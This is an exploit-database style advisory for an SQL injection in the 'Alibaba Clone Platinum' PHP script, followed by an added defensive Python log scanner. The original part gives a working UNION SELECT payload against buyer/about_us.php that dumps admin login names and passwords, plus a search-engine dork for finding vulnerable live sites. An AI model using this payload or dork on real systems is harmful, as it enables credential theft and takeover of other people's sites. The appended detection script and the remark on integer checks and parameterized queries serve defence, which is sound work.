Quote:
# title: Alibaba Clone Platinum (about_us.php) sql Injection vulnerability
# edb-id: 12612
# cve-id: ()
# osvdb-id: ()
# author: Cobra_21
# published: 2010-05-15
# verified: Yes
-------------------------------------------------------------------------------------------
alibaba Clone Platinum (about_us.php) sql Injection vulnerability
-------------------------------------------------------------------------------------------
author: Cobra_21
mail: uyku_cu@windowslive.com
script home: http://www.alibabaclone.com/
price: $699 usd
dork: Inurl:buyer/about_us.php?buyerid
-------------------------------------------------------------------------------------------
sql injection: http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,concat%28loginid,0x3a,password%29,38,39,40%20from%20admin
-------------------------------------------------------------------------------------------
Exploit:
Quote:
http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,concat%28loginid,0x3a,password%29,38,39,40%20from%20admin
Dork for finding affected sites in search engines such as Google:
Quote:
inurl:buyer/about_us.php?buyerid
Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability
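Added example, not part of the original post or advisory: a log check a site operator could run to find requests to buyer/about_us.php whose buyerid is not a plain number, which is the shape of the request quoted above. The sample log lines are constructed, and the combined log format, the numeric form of buyerid, and the names inspect_line and scan are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from a real server; the payload is shortened).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/May/2010:10:01:02 +0000] "GET /shop/buyer/about_us.php?buyerid=31 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [15/May/2010:10:03:44 +0000] "GET /shop/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,concat%28loginid,0x3a,password%29%20from%20admin HTTP/1.1" 200 5342',
    '198.51.100.9 - - [15/May/2010:10:04:10 +0000] "GET /shop/buyer/index.php?page=2 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [15/May/2010:10:05:31 +0000] "GET /shop/buyer/about_us.php?buyerid=12%27 HTTP/1.1" 500 310',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
INT_RE = re.compile(r"\d{1,10}")            # assumption: buyerid is a numeric ID
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)  # inline comments used in place of spaces
SQL_TOKENS = re.compile(r"\b(union|select|concat|from|information_schema)\b", re.I)


def inspect_line(line):
    """Return a finding for a non-numeric buyerid on about_us.php, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/buyer/about_us.php"):
        return None
    # parse_qs percent-decodes the value, so %20 and %28 are seen as ' ' and '('.
    for value in parse_qs(url.query, keep_blank_values=True).get("buyerid", []):
        if INT_RE.fullmatch(value):
            continue  # expected shape, nothing to report
        normalized = COMMENT_RE.sub(" ", value)
        tokens = sorted({t.lower() for t in SQL_TOKENS.findall(normalized)})
        return {"client": client, "status": int(status),
                "buyerid": value, "sql_tokens": tokens}
    return None


def scan(lines):
    """Collect findings for every log line that carries a suspicious buyerid."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer check, applied in the script before buyerid reaches the query and combined with a parameterized statement, rejects the quoted request outright.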